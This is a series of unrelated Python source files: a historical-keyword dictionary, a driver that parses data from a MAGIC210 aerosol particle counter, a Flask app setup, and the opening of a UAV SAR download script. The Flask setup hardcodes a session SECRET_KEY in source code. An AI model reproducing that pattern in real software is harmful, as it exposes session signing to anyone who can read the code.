"Nazi boycott",
"1933 Enabling Act",
"Enabling Act of 1933",
"Enabling Act",
"Kristallnacht",
"November Pogrom",
"Night of Broken Glass",
"IG Farben",
"Final Solution to the Jewish Question",
"Final Solution",
"Genocide",
"racial segregation",
"Jews",
"jewish",
"Holocaust",
"Shoah",
"The Shoah",
"work camp",
"forced labor",
"forced-labor",
"forced-labor camp",
"concentration camp",
"satellite camp",
"subcamp",
"deportation",
"deported",
"Zyklon B",
"ghettos",
"kapo",
"gas chambers",
"death squads",
"death marches",
"extermination camp",
"Auschwitz",
"Mauthausen",
"Neuengamme",
"Sachsenhausen",
"Sachsenhausen-Oranienburg",
"Monowitz",
"Dachau",
"Gross-Rosen",
"Buchenwald",
"Ravensbruck",
"Natzweiler",
"Natzweiler-Struthof",
"Flossenburg",
"Aktion 14f13",
"Action 14f13",
"Nuremberg",
"Nuremberg Trials",
"Gulag",
"Molotov-Ribbentrop Pact",
"warfare",
"Blitz",
"conflict",
"bombing",
"air warfare",
"terror bombing",
"startegic bombic",
"Pearl Harbor",
"Attack of Pearl Harbor",
"Attack on Pearl Harbor",
"Hiroshima",
"Nagasaki",
"Operation Downfall",
"Battle of MoscowBattle of Kursk",
"Normandy landings",
"Operation Neptune",
"Operation Overlord",
"Western Allied Invasion",
"Dunkirk",
"Battle of Dunkirk",
"Battle of Guadalcanal",
"Guadalcanal campaign",
"Operation Watchtower",
"Battle of Britain",
"Battle of Crete",
"Operation Market Garden",
"Battle of Monte Cassino",
"Battle of Okinawa",
"Balkans Campaign",
"Battle of Hurtgen Forest",
"Battle of the Atlantic",
"Battle of Leyte Gulf",
"Operation Barbarossa",
"Stalingrad",
"Battle of Stalingrad",
"Battle of Philippine Sea",
"Battle of Midway",
"Battle of Anzio",
"Japanese Invasion of Malaya",
"Battle of the Coral Sea",
"Battle of Bulge",
"Operation Himmler",
"invasion",
"Invasion of Poland",
"Battle of France",
"collaborator",
"occupation",
"Gau Baden",
"occupation of Baltic states",
"German-occupied France",
"Free France",
"Fall of France",
"Proclamation Defining Terms of Japanese Surrender",
"Berlin Strategic Offensive Operation",
"Anschluss",
"Anschluss Osterreichs",
"November Pogroms",
"Western Allied Invasion of Germany",
"Battle of Berlin",
"Fall of Berlin",
"prisonners of war",
"POW",
"Victory Day",
"V-day",
"Potsdam Declaration",
"Munich Agreement",
"Munich Betrayal",
"Charles de Gaulle",
"de Gaulle",
"Petain",
"Philippe Petain",
"Marshal Petain",
"Churchill",
"Winston Churchill",
"Franklin D. Roosevelt",
"Franklin Roosevelt",
"Roosevelt",
"Benito Mussolini",
"Mussolini",
"Joseph Stalin",
"Stalin",
"Adolf Hitler",
"Hitler",
"Himmler",
"Heinrich Himmler",
"Josef Mengele",
"Mengele",
"Chiang Kai-shek",
"Kai-shek",
"Hirohito"
],
"Atomic Age": [
"Atomic Age",
"Atomic Era",
"nuclear warfare",
"nuclear arms race",
"Nevada Test Site",
"trinity test",
"three mile island accident",
"the Gadget",
"Hiroshima",
"Nagasaki",
"nuclear meltdownChernobyl",
"Chernobyl disaster",
"United States Atomic energy commission",
"Atomic Energy Commission",
"AEC",
"dirty bombs",
"Tohoku earthquake",
"Fukushima",
"Fukushima Daiichi",
"Fukushima Daiichi nuclear disaster",
"Fukushima I Nuclear Power Plant",
"GPM",
"anti-nuclear movement",
"Great Peace March for Global Nuclear Disarmament",
"START I",
"START I treaty",
"New START treaty",
"New START"
],
"Cold War Period": [
"Cold War",
"Cold War period",
"Soviet Union",
"USSR",
"Communist",
"Communist Party",
"Communist Bloc",
"Socialist Bloc",
"Soviet Bloc",
"Eastern Bloc",
"Russia",
"Berlin Crisis of 1961",
"United States",
"Western Bloc",
"Capitalist Bloc",
"Democratic",
"Liberal Democratic",
"Iron Curtain",
"NATO",
"OTAN",
"Revolutions of 1989",
"Fall of Communism",
"Fall of Nations",
"Autumn of Nations",
"Berlin Wall",
"Fall of Berlin Wall",
"Dissolution of Soviet Union",
"Strategic Arms Limitation Talks",
"SALT I",
"SALT II",
"August Coup",
"1991 August Coup",
"August Coup of 1991",
"Mikhail Gorbachev",
"Glasnost Meeting",
"Glasnost Rally",
"Glasnost",
"perestroika",
"Caribbean Crisis",
"Cuban Missile Crisis",
"October Crisis of 1962",
"Missile Scare",
"Berlin Blockade",
"Black Sea Bumping incident",
"Bezzavetny",
"USS Yorktown",
"Korean War",
"People's Republic of China",
"Sino-Soviet split",
"Chinese Civil War",
"Soviet-Afghan War",
"Truman",
"Harry Truman",
"Harry S. Truman",
"Ronald Reagan",
"Reagan",
"Reagan doctrine",
"Truman Doctrine",
"North Atlantic Treaty",
"Washington Treaty",
"Trente Glorieuses",
"Era of Stagnation",
"Brezhnevian Stagnation",
"Stagnation Period",
"Warsaw Pact",
"Operation Danube",
"Prague Spring",
"Decolonization",
"Decolonization of Africa",
"Vietnam war",
"Second Indochina War",
"Resistance War Against America",
"American War",
"Suez Crisis",
"Second Arab-Israeli War",
"tripartite aggression",
"Sinai war"
],
"Space Age": [
"Space Age",
"Space Race",
"Space Technology",
"SpaceX",
"International Space station",
"ISS",
"Ansari X Prize",
"Sputnik 1",
"NASA",
"Apollo programApollo 11",
"Space Shuttle Challenger",
"Space Shuttle Challenger disaster",
"Challenger disaster",
"Challenger",
"Space Exploration",
"Space Ship One",
"Space Shuttle",
"private spaceflight"
],
"Age of Information": [
"Age of Information",
"Computer Age",
"New Media Age",
"Digital Age",
"Information Age",
"United Nations Public Administration Network",
"computers",
"innovations",
"data"
]}
return history_terminology
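# --- Hedged usage sketch (`find_periods` is a hypothetical helper, not part
# of the original module): reverse lookup from a keyword to every period
# whose terminology list contains it.
# def find_periods(term):
#     terminology = getHistoricalTerminologyDict()
#     needle = term.lower()
#     return [period for period, keywords in terminology.items()
#             if any(needle == kw.lower() for kw in keywords)]
#
# find_periods("pharaoh")  # -> ['Old Kingdom', 'Middle Kingdom', 'New Kingdom']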
|
from datetime import datetime
import pytz
from daq.instrument.instrument import Instrument
from shared.data.message import Message
from shared.data.status import Status
import asyncio
from shared.utilities.util import time_to_next, string_to_dt, dt_to_string
from daq.interface.interface import Interface
class ADInstrument(Instrument):
INSTANTIABLE = False
def __init__(self, config, **kwargs):
super(ADInstrument, self).__init__(config, **kwargs)
self.mfg = "AerosolDevices"
def setup(self):
super().setup()
# TODO: add properties get/set to interface for
# things like readmethod
class MAGIC210(ADInstrument):
INSTANTIABLE = True
def __init__(self, config, **kwargs):
super(MAGIC210, self).__init__(config, **kwargs)
self.name = "MAGIC210"
self.model = "210"
self.tag_list = [
"concentration",
"aerosol",
"physics",
]
self.iface_meas_map = None
self.polling_task = None
# override how often metadata is sent
self.include_metadata_interval = 300
# this instrument appears to work with readline
# self.iface_options = {
# 'read_method': 'readuntil',
# 'read_terminator': '\r',
# }
self.setup()
# def get_datafile_config(self):
# config = super().get_datafile_config()
# config["save_interval"] = 0
# return config
def setup(self):
super().setup()
# default coms:
# Baud rate: 115200
# Bits: 8
# Stop bits: 1
# Parity: none
# Flow Control: none
self.iface = None
if self.iface_components["default"]:
if_id = self.iface_components["default"]
self.iface = self.iface_map[if_id]
else:
self.iface = next(iter(self.iface_map.values()))
self.is_polled = False
# self.poll_rate = 2 # every second
self.parse_map = dict()
self.data_record_template = dict()
definition = self.get_definition_instance()
meas_config = definition["DEFINITION"]["measurement_config"]
for msetsname, mset in meas_config.items():
# self.data_record_template[msetname] = dict()
for name, meas in mset.items():
if "parse_label" in meas:
parse_label = meas["parse_label"]
self.parse_map[parse_label] = name
# self.data_record_template[msetsname][name] = None
self.data_record_template[name] = {"VALUE": None}
self.status["ready_to_run"] = True
self.status2.set_run_status(Status.READY_TO_RUN)
self.enable()
print("done")
async def shutdown(self):
self.stop()
self.disable()
await self.deregister_from_UI()
await super().shutdown()
def enable(self):
super().enable()
asyncio.create_task(self.stop_logging())
# # if self.is_polled:
# self.polling_task = asyncio.create_task(self.poll_loop())
# asyncio.create_task(self.toggle_mcpc_power(power=0))
def disable(self):
# asyncio.create_task(self.toggle_mcpc_power(power=0))
# if self.polling_task:
# self.polling_task.cancel()
super().disable()
def start(self, cmd=None):
super().start()
asyncio.create_task(self.start_logging())
async def start_logging(self):
if self.iface:
# if self.iface_components["default"]:
# if_id = self.iface_components["default"]
# self.current_read_cnt = 0
# await asyncio.sleep(0.1)
# Start logging
cmd = "Log,1\n"
msg = Message(
sender_id=self.get_id(),
msgtype=Instrument.class_type,
subject="SEND",
body=cmd,
)
# print(f'msg: {msg}')
# await self.iface.message_from_parent(msg)
# await self.iface_map[if_id].message_from_parent(msg)
await self.iface.message_from_parent(msg)
# TODO: Send start command:
# Log,1 <- Starts sending data every second
async def stop_logging(self):
if self.iface:
# if self.iface_components["default"]:
# if_id = self.iface_components["default"]
# self.current_read_cnt = 0
# await asyncio.sleep(0.1)
# Start logging
cmd = "Log,0\n"
msg = Message(
sender_id=self.get_id(),
msgtype=Instrument.class_type,
subject="SEND",
body=cmd,
)
# print(f'msg: {msg}')
# await self.iface.message_from_parent(msg)
# await self.iface_map[if_id].message_from_parent(msg)
await self.iface.message_from_parent(msg)
def stop(self, cmd=None):
# TODO: Send start command:
# Log,0 <- Stops sending data
asyncio.create_task(self.stop_logging())
super().stop()
async def handle(self, msg, type=None):
# print(f'%%%%% MAGIC210.handle: {msg.to_json()}')
if type == "FromChild" and msg.type == Interface.class_type:
dt = self.parse(msg)
# print(f'dt = {dt}')
if dt:
entry = self.get_data_entry(dt)
data = Message(
sender_id=self.get_id(),
msgtype=Instrument.class_type,
)
data.update(subject="DATA", body=entry)
await self.message_to_ui(data)
await super().handle(msg, type)
async def handle_control_action(self, control, value):
if control and value is not None:
if control == "start_stop":
await super(MAGIC210, self).handle_control_action(control, value)
def parse(self, msg):
# print(f'parse: {msg}')
# entry = dict()
# entry['METADATA'] = self.get_metadata()
# data = dict()
# data['DATETIME'] = msg.body['DATETIME']
dt = msg.body["DATETIME"]
if dt:
line = msg.body["DATA"].strip()
params = line.split(",")
            # the record is parsed through params[23], so at least 24 fields are required
            if len(params) < 24:
                return None
labels = [
"magic_datetime",
"concentration", # 1
"dew_pt_inlet",
"temperature_inlet",
"rh_inlet",
"temperature_conditioner",
"temperature_initiator",
"temperature_moderator",
"temperature_optics",
"temperature_heatsink",
"temperature_pcb",
"temperature_cabinet",
"ps_voltage",
"diff_pressure",
"pressure",
"sample_flow",
"interval_time", # 16
"live_time",
"dead_time",
"raw_counts_lower",
"raw_counts_higher",
"error",
"error_string",
"serial_number",
]
# TODO parse magic_dt
dts = params[0]
try:
# dt = datetime.strptime(magic_dt,'%Y/%m/%d %H:%M:%S')
# pytz.utc.localize(dt)
tmp_dt = string_to_dt(dts, format='%Y/%m/%d %H:%M:%S')
magic_dt = dt_to_string(tmp_dt)
except ValueError:
magic_dt = ""
self.update_data_record(dt, {"magic_datetime": magic_dt})
for i in range(1, 16):
val = float(params[i])
self.update_data_record(dt, {labels[i]: round(val, 3)})
# interval_time
val = int(params[16])
self.update_data_record(dt, {labels[16]: val})
# live/dead times
val = int(params[17])
self.update_data_record(dt, {labels[17]: val})
val = int(params[18])
self.update_data_record(dt, {labels[18]: val})
# raw_counts
val = int(params[19])
self.update_data_record(dt, {labels[19]: val})
val = int(params[20])
self.update_data_record(dt, {labels[20]: val})
# error
val = int(params[21])
self.update_data_record(dt, {labels[21]: val})
# error_string
self.update_data_record(dt, {labels[22]: params[22]})
# s/n
val = int(params[23])
self.update_data_record(dt, {labels[23]: val})
return dt
def get_definition_instance(self):
# make sure it's good for json
# def_json = json.dumps(DummyInstrument.get_definition())
# print(f'def_json: {def_json}')
# return json.loads(def_json)
return MAGIC210.get_definition()
    @staticmethod
    def get_definition():
# TODO: come up with static definition method
definition = dict()
definition["module"] = MAGIC210.__module__
definition["name"] = MAGIC210.__name__
definition["mfg"] = "AerosolDevices"
definition["model"] = "210"
definition["type"] = "ParticleConcentration"
definition["tags"] = [
"concentration",
"particle",
"aerosol",
"physics",
"aerosoldevices",
"ad",
]
measurement_config = dict()
        # array for plot config
y_data = []
# TODO: add interface entry for each measurement
primary_meas = dict()
primary_meas["concentration"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "cm-3", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "conc",
"parse_label": "conc",
"control": None,
}
y_data.append("concentration")
process_meas = dict()
process_meas["dew_pt_inlet"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "degC", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "dewpt_in",
"control": None,
}
y_data.append("dew_pt_inlet")
process_meas["temperature_inlet"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "degC", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "temp_in",
"control": None,
}
y_data.append("temperature_inlet")
process_meas["rh_inlet"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "%", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "rh_in",
"control": None,
}
y_data.append("rh_inlet")
process_meas["temperature_conditioner"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "degC", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "temp_cond",
"control": None,
}
y_data.append("temperature_conditioner")
process_meas["temperature_initiator"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "degC", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "temp_ini",
"control": None,
}
y_data.append("temperature_initiator")
process_meas["temperature_moderator"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "degC", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "temp_mod",
"control": None,
}
y_data.append("temperature_moderator")
process_meas["temperature_optics"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "degC", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "temp_opt",
"control": None,
}
y_data.append("temperature_optics")
process_meas["temperature_heatsink"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "degC", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "temp_hsk",
"control": None,
}
y_data.append("temperature_heatsink")
process_meas["temperature_pcb"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "degC", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "temp_pcb",
"control": None,
}
y_data.append("temperature_pcb")
process_meas["temperature_cabinet"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "degC", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "temp_cab",
"control": None,
}
y_data.append("temperature_cabinet")
process_meas["ps_voltage"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "volts", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "ps_v",
"control": None,
}
y_data.append("ps_voltage")
process_meas["diff_pressure"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "mb", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "dpress",
"control": None,
}
y_data.append("diff_pressure")
process_meas["pressure"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "mb", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "press",
"control": None,
}
y_data.append("pressure")
process_meas["sample_flow"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "cm3 min-1", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "samp_flow",
"control": None,
}
y_data.append("sample_flow")
process_meas["interval_time"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "sec", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "intv_time",
"control": None,
}
y_data.append("interval_time")
process_meas["live_time"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "counts", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "live_time",
"control": None,
}
y_data.append("live_time")
process_meas["dead_time"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "counts", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "dead_time",
"control": None,
}
y_data.append("dead_time")
process_meas["raw_counts_lower"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "counts", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "raw_cnts_lo",
"control": None,
}
y_data.append("raw_counts_lower")
process_meas["raw_counts_higher"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "counts", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "raw_cnts_hi",
"control": None,
}
y_data.append("raw_counts_higher")
process_meas["error"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "counts", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"parse_label": "err",
"control": None,
}
y_data.append("error")
process_meas["error_string"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "string", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "err_string",
"control": None,
}
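    # A repeated-pattern note: every entry above shares the same TIME-series
    # skeleton. A minimal helper sketch (hypothetical, not part of this module)
    # that could generate them:
    #
    # def time_series_entry(units, short_name, uncertainty=0.2):
    #     return {
    #         "dimensions": {
    #             "axes": ["TIME"],
    #             "unlimited": "TIME",
    #             "units": ["dateTime"],
    #         },
    #         "units": units,  # should be cfunits or udunits
    #         "uncertainty": uncertainty,
    #         "source": "MEASURED",
    #         "data_type": "NUMERIC",
    #         "short_name": short_name,
    #         "control": None,
    #     }
    #
    # process_meas["pressure"] = time_series_entry("mb", "press")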
# y_data.append("mcpc_sample_flow")
info_meas = dict()
info_meas['magic_datetime'] = {
'dimensions': {
'axes': ['TIME'],
'unlimited': 'TIME',
'units': ['dateTime'],
},
'units': 'dateTime', # should be cfunits or udunits
'uncertainty': 0.2,
'source': 'calculated',
'data_type': 'NUMERIC',
# 'short_name': 'int_conc',
# 'parse_label': 'scan_max_volts',
'control': None,
}
info_meas["serial_number"] = {
"dimensions": {
"axes": ["TIME"],
"unlimited": "TIME",
"units": ["dateTime"],
},
"units": "counts", # should be cfunits or udunits
"uncertainty": 0.2,
"source": "MEASURED",
"data_type": "NUMERIC",
"short_name": "ser_num",
"control": None,
}
# y_data.append('pops_datetime')
# y_data.append("mcpc_saturator_flow")
# TODO: add settings controls
controls = dict()
# controls["mcpc_power_control"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [0, 1],
# "default_value": 0,
# "label": "MCPC power",
# "parse_label": "mcpcpwr",
# "control_group": "Power",
# }
# controls["mcpc_pump_power_control"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [0, 1],
# "default_value": 0,
# "label": "MCPC pump power",
# "parse_label": "mcpcpmp",
# "control_group": "Power",
# }
# controls["sheath_flow_sp"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "liters min-1",
# "allowed_range": [0, 4],
# "default_value": 2.5,
# "label": "Sheath Flow",
# "parse_label": "sheath_sp",
# "control_group": "Flows",
# }
# y_data.append("sheath_flow_sp")
# # TODO: add settings controls
# controls["number_bins"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [0, 100],
# "default_value": 30,
# "label": "Number of bins",
# "parse_label": "num_bins",
# "control_group": "Scan Settings",
# }
# controls["bin_time"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "sec",
# "allowed_range": [0.25, 60],
# "default_value": 1,
# "label": "Seconds per bin",
# "parse_label": "bin_time",
# "control_group": "Scan Settings",
# }
# controls["scan_type"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [0, 2],
# "default_value": 0,
# "label": "Scan type",
# "parse_label": "scan_type",
# "control_group": "Scan Settings",
# }
# controls["max_diameter_sp"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "nm",
# "allowed_range": [10, 300],
# "default_value": 300,
# "label": "Max Dp",
# "parse_label": "scan_max_dia",
# "control_group": "Scan Settings",
# }
# controls["min_diameter_sp"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "nm",
# "allowed_range": [10, 300],
# "default_value": 10,
# "label": "Min Dp",
# "parse_label": "scan_min_dia",
# "control_group": "Scan Settings",
# }
# controls["plumbing_time"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "sec",
# "allowed_range": [0, 10],
# "default_value": 1.2,
# "label": "Plumbing time",
# "parse_label": "plumbing_time",
# "control_group": "Scan Settings",
# }
# controls["mcpc_a_installed"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [0, 1],
# "default_value": 1,
# "label": "MCPC A installed",
# "parse_label": "mcpc_a_yn",
# "control_group": "Hardware Settings",
# }
# controls["mcpc_b_installed"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [0, 1],
# "default_value": 00,
# "label": "MCPC B installed",
# "parse_label": "mcpc_b_yn",
# "control_group": "Hardware Settings",
# }
# controls["mcpc_b_flow_sp"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "liters min-1",
# "allowed_range": [0, 2],
# "default_value": 0.36,
# "label": "MCPC B flow",
# "parse_label": "mcpc_b_flw",
# "control_group": "Hardware Settings",
# }
# controls["sample_rh_installed"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [0, 1],
# "default_value": 0,
# "label": "Sample RH installed",
# "parse_label": "samp_rh_yn",
# "control_group": "Hardware Settings",
# }
# controls["sheath_rh_installed"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [0, 1],
# "default_value": 0,
# "label": "Sheath RH installed",
# "parse_label": "sheath_rh_yn",
# "control_group": "Hardware Settings",
# }
# controls["column_type"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [0, 2],
# "default_value": 1,
# "label": "Column type",
# "parse_label": "sheath_rh_yn",
# "control_group": "Hardware Settings",
# }
# controls["sheath_c2"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [-65535, 65535],
# # 'default_value': -1562.3,
# "default_value": -5063.00,
# "label": "Sheath C2",
# "parse_label": "sheath_c2",
# "control_group": "Calibration",
# }
# controls["sheath_c1"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [-65535, 65535],
# # 'default_value': 1556.5,
# "default_value": 1454.50,
# "label": "Sheath C1",
# "parse_label": "sheath_c1",
# "control_group": "Calibration",
# }
# controls["sheath_c0"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [-65535, 65535],
# # 'default_value': -5603.2,
# "default_value": -5773.00,
# "label": "Sheath C0",
# "parse_label": "sheath_c0",
# "control_group": "Calibration",
# }
# controls["cal_temp"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [-65535, 65535],
# # 'default_value': 27.2,
# "default_value": 30.6,
# "label": "Calibration T",
# "parse_label": "cal_temp",
# "control_group": "Calibration",
# }
# controls["imp_slope"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [-65535, 65535],
# # 'default_value': 2329,
# "default_value": 2329.5,
# "label": "Impactor slope",
# "parse_label": "impct_slp",
# "control_group": "Calibration",
# }
# controls["imp_offset"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [-65535, 65535],
# # 'default_value': -679,
# "default_value": -935.7,
# "label": "Impactor offset",
# "parse_label": "impct_off",
# "control_group": "Calibration",
# }
# controls["pressure_slope"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [-65535, 65535],
# # 'default_value': 3885.9,
# "default_value": 3940.0,
# "label": "Pressure slope",
# "parse_label": "press_slp",
# "control_group": "Calibration",
# }
# controls["pressure_offset"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [-65535, 65535],
# # 'default_value': -1266.3,
# "default_value": -1791.0,
# "label": "Pressure offset",
# "parse_label": "press_off",
# "control_group": "Calibration",
# }
# controls["hv_slope"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [-65535, 65535],
# # 'default_value': 1491.1,
# "default_value": 1494.0,
# "label": "HV slope",
# "parse_label": "hv_slope",
# "control_group": "Calibration",
# }
# controls["hv_offset"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [-65535, 65535],
# # 'default_value': 776.2,
# "default_value": 782.8,
# "label": "HV offset",
# "parse_label": "hv_offset",
# "control_group": "Calibration",
# }
# controls["ext_volts_slope"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [-65535, 65535],
# "default_value": 4841.0,
# "label": "ExtVolts slope",
# "parse_label": "ext_volts_slope",
# "control_group": "Calibration",
# }
# controls["ext_volts_offset"] = {
# "data_type": "NUMERIC",
# # units are tied to parameter this controls
# "units": "counts",
# "allowed_range": [-65535, 65535],
# "default_value": -4713.0,
# "label": "ExtVolts offset",
# "parse_label": "ext_volts_offset",
# "control_group": "Calibration",
# }
measurement_config["primary"] = primary_meas
measurement_config["process"] = process_meas
measurement_config["info"] = info_meas
# measurement_config["controls"] = controls
definition["measurement_config"] = measurement_config
plot_config = dict()
time_series1d = dict()
time_series1d["app_type"] = "TimeSeries1D"
time_series1d["y_data"] = y_data
time_series1d["default_y_data"] = ["concentration"]
source_map = {
"default": {
"y_data": {"default": y_data},
"default_y_data": ["concentration"],
},
}
time_series1d["source_map"] = source_map
# size_dist['dist_data'] = dist_data
# size_dist['default_dist_data'] = ['size_distribution']
plot_config["plots"] = dict()
plot_config["plots"]["main_ts1d"] = time_series1d
definition["plot_config"] = plot_config
return {"DEFINITION": definition}
# DAQ.daq_definition['DEFINITION'] = definition
# return DAQ.daq_definition
|
"""
Package: app
Package for the application models and services
This module also sets up the logging to be used with gunicorn
"""
import logging
from flask import Flask
from .models import Inventory, DataValidationError
# Create Flask application
app = Flask(__name__)
app.config['SECRET_KEY'] = 'please, tell nobody... Shhhh'
app.config['LOGGING_LEVEL'] = logging.INFO
from . import service  # relative import: service lives inside this package
# Set up logging for production
#print ('Setting up logging for {}...'.format(__name__))
if __name__ != '__main__':
gunicorn_logger = logging.getLogger('gunicorn.error')
if gunicorn_logger:
app.logger.handlers = gunicorn_logger.handlers
app.logger.setLevel(gunicorn_logger.level)
app.logger.info('Logging established')
@app.before_first_request
def init_db(dbname="inventory"):
""" Initlaize the model """
Inventory.init_db(dbname)
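# Example launch under gunicorn (hypothetical module path), which provides the
# 'gunicorn.error' logger whose handlers are adopted above:
#   gunicorn --log-level=info "app:app"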
|
#!/usr/bin/env python
# coding: utf-8
'''UAV SAR Download API
Software for Earth Big Data Processing, Prediction Modeling and Organization (SEPPO)
(c) 2020 Earth Big Data LLC
Author: Josef Kellndorfer,
Date: 2020-01-30
'''
from __future__ import print_function
try:
from urllib.request import urlopen # Python 3
# print('Python 3')
except ImportError:
    from urllib2 import urlopen # Python 2
# print('Python 2')
import os,sys
dl_tries=5 # Hardcoded number of download retries (wget -t / curl --retry)
def myargsparse(a):
import argparse
class CustomFormatter(argparse.ArgumentDefaultsHelpFormatter, argparse.RawDescriptionHelpFormatter):
pass
thisprog=os.path.basename(a[0])
epilog='''
\r************
\r* Examples *
\r************
\r**** LIST all data takes
\r{thisprog} -ldt
\r{thisprog} -ldt --campaign NISARA
\r{thisprog} -ldt --campaign NISARA --site 06800
\r**** Download all datatakes for a campaign and site
